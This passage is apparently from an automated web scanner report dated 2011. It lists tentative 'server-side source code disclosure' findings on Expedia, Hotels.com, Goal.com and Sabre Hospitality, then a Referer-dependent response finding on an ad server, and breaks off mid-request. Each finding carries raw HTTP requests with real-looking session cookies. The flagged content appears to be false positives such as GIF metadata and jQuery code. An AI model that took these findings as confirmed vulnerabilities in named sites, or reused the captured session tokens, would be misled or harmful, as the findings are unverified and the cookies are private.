</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...
16.7. http://www.expedia.com/static/default/default/images/infosite/button_beak_b.gif  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/button_beak_b.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/button_beak_b.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1184-1317085588075"
Last-Modified: Tue, 27 Sep 2011 01:06:28 GMT
Content-Length: 1184
Date: Mon, 03 Oct 2011 00:13:12 GMT
Connection: close

GIF89a...........f.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...
16.8. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/rating_bar.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/rating_bar.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1348-1317080324131"
Last-Modified: Mon, 26 Sep 2011 23:38:44 GMT
Content-Length: 1348
Date: Mon, 03 Oct 2011 00:13:11 GMT
Connection: close

GIF89ab........9..L.._.._..r..L...........
..'...............!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...
16.9. http://www.expedia.com/static/default/default/images/infosite/rooms_left_middle.gif  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/rooms_left_middle.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/rooms_left_middle.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1096-1317080311412"
Last-Modified: Mon, 26 Sep 2011 23:38:31 GMT
Content-Length: 1096
Date: Mon, 03 Oct 2011 00:13:14 GMT
Connection: close

GIF89a........f....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rd
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...
16.10. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/videoPlayLarge.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/videoPlayLarge.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1275-1317085617344"
Last-Modified: Tue, 27 Sep 2011 01:06:57 GMT
Content-Length: 1275
Date: Mon, 03 Oct 2011 00:13:01 GMT
Connection: close

GIF89a-.-......i.f.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...
16.11. http://www.expedia.com/static/fusion/v2.3/images/progressAnim.gif  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/progressAnim.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/fusion/v2.3/images/progressAnim.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; JSESSION=965e7753-b813-4f22-a4ce-feaa1b098dbb; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1651-1317085619476"
Last-Modified: Tue, 27 Sep 2011 01:06:59 GMT
Content-Length: 1651
Date: Mon, 03 Oct 2011 00:09:40 GMT
Connection: close

GIF89aS..................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...
16.12. http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.goal.com
Path:   /en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1479357280-1317599429942; __utma=167609825.336600251.1317599442.1317599442.1317599442.1; __utmb=167609825.1.10.1317599442; __utmc=167609825; __utmz=167609825.1317599442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _em_hl=1; _em_vt=6b3bfb104abb2666e789b9e202024e62e18088e413-981323754e88f8d5; _em_v=cf9911b66e4d49b949eaf13bd6fa4e88f8d57af834-210214684e88f8d5

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0,must-revalidate,s-maxage=300
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:09 GMT
Expires: Sat, 01 Oct 2011 23:58:44 +0000
Last-Modified: Sun, 02 Oct 2011 23:58:44 GMT
Server: ECS (sjo/522B)
Vary: Accept-Encoding
X-Cache: HIT
X-Goal-Flavors: ad970x40navbar,epleague
Content-Length: 91057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div> <?/* empty because this one does not have controls */?>
<div class="clear">
...[SNIP]...
16.13. http://www.hotels.com/bundles/enhanced_search-H36.0.2-128976.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /bundles/enhanced_search-H36.0.2-128976.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /bundles/enhanced_search-H36.0.2-128976.js HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_IE|HCOM_IE
Content-Language: en_IE
Last-Modified: Thu, 29 Sep 2011 05:00:00 GMT
ntCoent-Length: 834821
Expect:
Content-Type: text/javascript
Content-Length: 834821
Cache-Control: private, max-age=0
Expires: Mon, 03 Oct 2011 00:09:16 GMT
Date: Mon, 03 Oct 2011 00:09:16 GMT
Connection: close
Vary: Accept-Encoding

/*
* jQuery JavaScript Library v1.6.1
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizz
...[SNIP]...
<%=(.+?)%>/g,"',$1,'").split("<%").join("');").split("%>").join("p.push('")+"');}return p.join('');";return new Function("ctx",B)}}}});$.registerModule({name:"hcom.common.form.modules.field_mgr",dependencies:["hcom.common.modules.emitter"],impl:function(){v
...[SNIP]...
16.14. http://www.hotels.com/bundles/hcom-H36.0.2-128976.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /bundles/hcom-H36.0.2-128976.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /bundles/hcom-H36.0.2-128976.js HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en_US
Last-Modified: Thu, 29 Sep 2011 05:00:00 GMT
ntCoent-Length: 568057
Expect:
Content-Type: text/javascript
Content-Length: 568057
Cache-Control: private, max-age=0
Expires: Mon, 03 Oct 2011 00:28:19 GMT
Date: Mon, 03 Oct 2011 00:28:19 GMT
Connection: close
Vary: Accept-Encoding

/*
* jQuery JavaScript Library v1.6.1
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizz
...[SNIP]...
<%=(.+?)%>/g,"',$1,'").split("<%").join("');").split("%>").join("p.push('")+"');}return p.join('');";return new Function("ctx",B)}}}});$.registerModule({name:"hcom.common.form.modules.field_mgr",dependencies:["hcom.common.modules.emitter"],impl:function(){v
...[SNIP]...
16.15. http://www.sabrehospitality.com/js/roundies.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.sabrehospitality.com
Path:   /js/roundies.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /js/roundies.js HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7578a4s2f2v2eeuc05nnpk0f35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:44 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 02 Jan 2009 03:19:06 GMT
ETag: "27cbd7-20ed-6751be80"
Accept-Ranges: bytes
Content-Length: 8429
Connection: close
Content-Type: application/x-javascript

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.d
...[SNIP]...
eturn p}('t K={16:\'K\',1L:G,1M:G,1d:G,2f:y(){u(D.2g!=8&&D.1N&&!D.1N[q.16]){q.1L=M;q.1M=M}17 u(D.2g==8){q.1d=M}},2h:D.2i,1O:[],1b:{},2j:y(){u(q.1L||q.1M){D.1N.2L(q.16,\'2M:2N-2O-2P:x\')}u(q.1d){D.2Q(\'<?2R 2S="\'+q.16+\'" 2T="#1P#2k" ?>\')}},2l:y(){t a=D.1k(\'z\');D.2m.1w.1Q(a,D.2m.1w.1w);u(a.12){2n{t b=a.12;b.1x(q.16+\'\\\\:*\',\'{1l:2U(#1P#2k)}\');q.12=b}2o(2p){}}17{q.12=a}},1x:y(a,b,c){u(1R b==\'1S\'||b===2V){b=0}u(b.2W.2q().1y(\'
...[SNIP]...
17. Referer-dependent response  previous  next
There are 6 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

17.1. http://d.tradex.openx.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://d.tradex.openx.com
Path:   /afr.php

Request 1

GET /afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response 1

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0; expires=Mon, 01-Oct-2012 23:52:00 GMT; path=/
Content-Length: 2906
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<script type="text/javascript">
OXM_ad = {"website":"c8eddb4a-d9d5-0c5b-6e12-562295aa26ea",
"size":"728x90",
"floor":"1.3",
"url":"http:\/\/www.goal.com\/en\/teams\/england\/97\/man-utd-news",
"channel":"oxpv1:34-632-1929-2254-6393",
"hrid":"b89b59a608f5ce9fb11f3ce62d19c7a3-1317599520",
"beacon":"<div id='beacon_d3da79db02' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=1929&amp;campaignid=632&amp;zoneid=6393&amp;cb=d3da79db02&amp;r_id=b89b59a608f5ce9fb11f3ce62d19c7a3&amp;r_ts=lsgqao' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>",
"fallback":"<!-- Rubicon Project tag -->\r\n<!-- Site: Goal.com Zone: My Site Size: Leaderboard (728x90) -->\r\n<script language=\"JavaScript\" type=\"text\/javascript\">\r\nvar cb = Math.random();\r\nvar d = document;\r\nd.write('<script language=\"JavaScript\" type=\"text\/javascript\"');\r\nd.write('src=\"http:\/\/optimized-by.rubiconproject.com\/a\/7743\/12359\/21900-2.js?cb='+cb+'\">');\r\nd.write('<\\\/scr'+'ipt>');\r\n<\/script>\r\n<!-- end Rubicon Project tag --><div id='beacon_d3da79db02' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=10996&amp;campaignid=3553&amp;zoneid=6393&amp;loc=1&amp;referer=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news&amp;cb=d3da79db02&amp;r_id=b89b59a608f5ce9fb11f3ce62d19c7a3&amp;r_ts=lsgqao' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>"};
</script>
<script type="text/javascript" src="http://bid.openx.net/jstag"></script>
<noscript><!-- Rubicon Project tag -->
<!-- Site: Goal.com Zone: My Site Size: Leaderboard (728x90) -->
<script language="JavaScript" type="text/javascript">
var cb = Math.random();
var d = document;
d.write('<script language="JavaScript" type="text/javascript"');
d.write('src="http://optimized-by.rubiconproject.com/a/7743/12359/21900-2.js?cb='+cb+'">');
d.write('<\/scr'+'ipt>');
</script>
<!-- end Rubicon Project tag --><div id='beacon_d3da79db02' style='posit
...[SNIP]...

Request 2

GET /afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
